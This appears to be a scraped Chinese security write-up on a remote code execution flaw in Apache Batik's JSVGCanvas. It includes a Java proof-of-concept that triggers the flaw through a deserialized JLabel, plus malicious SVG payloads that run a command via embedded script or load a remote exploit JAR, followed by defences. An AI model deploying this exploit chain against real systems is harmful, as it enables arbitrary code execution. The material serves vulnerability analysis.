Apache Batik Swing组件远程代码执行漏洞分析<\/h1>

漏洞概述<\/h2>
Apache Batik是一个用于处理SVG（可缩放矢量图形）格式文件的Java工具包。其中`batik-swing<\/code>组件包含的JSVGCanvas<\/code>类存在远程代码执行漏洞，攻击者可以通过构造特殊的SVG文件或HTML对象标签，诱使目标系统加载恶意代码并执行任意命令。<\/p>`

漏洞原理<\/h2>
该漏洞的核心在于JSVGCanvas<\/code>类能够加载并执行远程SVG文件中的JavaScript代码，而SVG文件支持内嵌ECMAScript脚本，这些脚本可以通过Java的反射机制调用Java API，最终导致任意代码执行。<\/p>
漏洞利用方式<\/h2>
方式一：SVG-JS触发<\/h3>
利用代码<\/h4>
package<\/span> me.n1ar4.exploit;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> javax.swing.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Field;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JSRCE<\/span> {<\/span>
<\/span><\/span>    public<\/span> Object getObject<\/span>()<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        JLabel label =<\/span> new<\/span> JLabel();<\/span>
<\/span><\/span>        label.<\/span>putClientProperty<\/span>(<\/span>"html.disable"<\/span>,<\/span> false<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Field textField =<\/span> label.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"text"<\/span>);<\/span>
<\/span><\/span>        textField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        textField.<\/span>set<\/span>(<\/span>label,<\/span>"<html><object "<\/span> +<\/span>
<\/span><\/span>                "classid=\"org.apache.batik.swing.JSVGCanvas\">"<\/span> +<\/span>
<\/span><\/span>                "<param name=\"URI\" value=\"http:\/\/localhost:8886\/2.xml\"><\/object><\/html>"<\/span>);<\/span>
<\/span><\/span>        return<\/span> label;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception{<\/span>
<\/span><\/span>        Object t =<\/span> new<\/span> JSRCE().<\/span>getObject<\/span>();<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> d =<\/span> SerUtil.<\/span>serialize<\/span>(<\/span>t);<\/span>
<\/span><\/span>        SerUtil.<\/span>deserialize<\/span>(<\/span>d);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>恶意SVG文件内容<\/h4>
<svg<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span> width=<\/span>"100"<\/span> height=<\/span>"100"<\/span>><\/span>
<\/span><\/span>    <circle<\/span> cx=<\/span>"50"<\/span> cy=<\/span>"50"<\/span> r=<\/span>"50"<\/span> fill=<\/span>"green"<\/span> onload=<\/span>"showFrame()"<\/span>\/><\/span>
<\/span><\/span>    <script<\/span> type=<\/span>"text\/ecmascript"<\/span>><\/span>
<\/span><\/span>        importPackage(Packages.java.lang);
<\/span><\/span>        function showFrame() {
<\/span><\/span>            Runtime.getRuntime().exec("calc.exe");
<\/span><\/span>        }
<\/span><\/span>    <\/script><\/span>
<\/span><\/span><\/svg><\/span>
<\/span><\/span><\/code><\/pre>方式二：SVG-JAR触发<\/h3>
利用代码<\/h4>
与方式一相同，只是引用的SVG文件不同。<\/p>
恶意SVG文件内容<\/h4>
<svg<\/span> xmlns=<\/span>"http:\/\/www.w3.org\/2000\/svg"<\/span> 
<\/span><\/span>     xmlns:xlink=<\/span>"http:\/\/www.w3.org\/1999\/xlink"<\/span> 
<\/span><\/span>     version=<\/span>"1.0"<\/span>><\/span>
<\/span><\/span>    <script<\/span> type=<\/span>"application\/java-archive"<\/span> 
<\/span><\/span>            xlink:href=<\/span>"http:\/\/localhost:8887\/exploit.jar"<\/span>\/><\/span>
<\/span><\/span>    <text><\/span>Static text ...<\/text><\/span>
<\/span><\/span><\/svg><\/span>
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
触发流程<\/h3>

攻击者构造一个JLabel对象，设置其text属性为包含恶意object标签的HTML<\/li>
object标签指定classid为org.apache.batik.swing.JSVGCanvas<\/code><\/li>
通过param设置URI参数指向恶意SVG文件<\/li>
当目标系统解析该HTML时，会加载并执行SVG文件中的恶意代码<\/li>
<\/ol>
关键点分析<\/h3>


HTML OBJECT标签解析<\/strong>：<\/p>

Java Swing的HTML解析器支持OBJECT标签<\/li>
classid属性指定要实例化的Java类<\/li>
param标签用于设置类实例的参数<\/li>
<\/ul>
<\/li>

JSVGCanvas类<\/strong>：<\/p>

必须有无参构造函数<\/li>
必须继承Component接口<\/li>
提供setURI方法用于加载远程SVG<\/li>
<\/ul>
<\/li>

SVG脚本执行<\/strong>：<\/p>

SVG支持内嵌ECMAScript脚本<\/li>
脚本可以通过Java反射调用Java API<\/li>
通过importPackage<\/code>可以导入Java包<\/li>
能够直接调用Runtime.getRuntime().exec()<\/code><\/li>
<\/ul>
<\/li>

JAR加载<\/strong>：<\/p>

SVG支持通过application\/java-archive<\/code>类型加载远程JAR<\/li>
加载的JAR会被执行<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>

升级到最新版本的Apache Batik<\/li>
禁用HTML中的OBJECT标签解析<\/li>
限制SVG文件中的脚本执行<\/li>
对加载的远程资源进行严格校验<\/li>
使用安全策略限制Java的反射和外部命令执行能力<\/li>
<\/ol>
参考链接<\/h2>

Apache Batik官方网站<\/a><\/li>
GitHub PoC代码<\/a><\/li>
<\/ul>
总结<\/h2>
该漏洞展示了Java Swing组件与SVG解析器结合使用时可能带来的安全风险。攻击者可以通过精心构造的HTML和SVG文件，利用Java的反射机制和脚本执行能力实现远程代码执行。开发人员在使用相关组件时应特别注意安全配置，及时更新依赖库，并对用户输入进行严格过滤。<\/p>

Apache Batik Swing组件远程代码执行漏洞分析<\/h1>

方式一：SVG-JS触发<\/h3>

方式二：SVG-JAR触发<\/h3>

利用代码<\/h4> 与方式一相同，只是引用的SVG文件不同。<\/p>

漏洞分析<\/h2>

利用代码<\/h4>
与方式一相同，只是引用的SVG文件不同。<\/p>